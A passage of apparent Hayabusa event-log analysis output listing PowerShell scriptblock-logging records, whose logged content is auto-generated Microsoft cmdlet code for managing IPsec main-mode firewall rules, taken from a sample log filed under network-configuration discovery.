[ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"= $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Enable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') 